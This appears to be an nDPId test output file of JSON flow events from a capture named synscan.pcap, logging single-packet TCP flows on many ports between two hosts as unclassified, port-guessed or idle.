-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":85,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1824,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":85,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":84,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":84,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":85,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":85,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2135,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2135,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00703{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00703{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1040,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":89,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1040,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":89,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":90,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":90,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":89,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":89,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":90,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":90,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61532,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61532,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61532,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61532,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8290,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8290,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":99,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":99,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8291,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8291,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8292,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":99,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":99,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8291,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8291,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 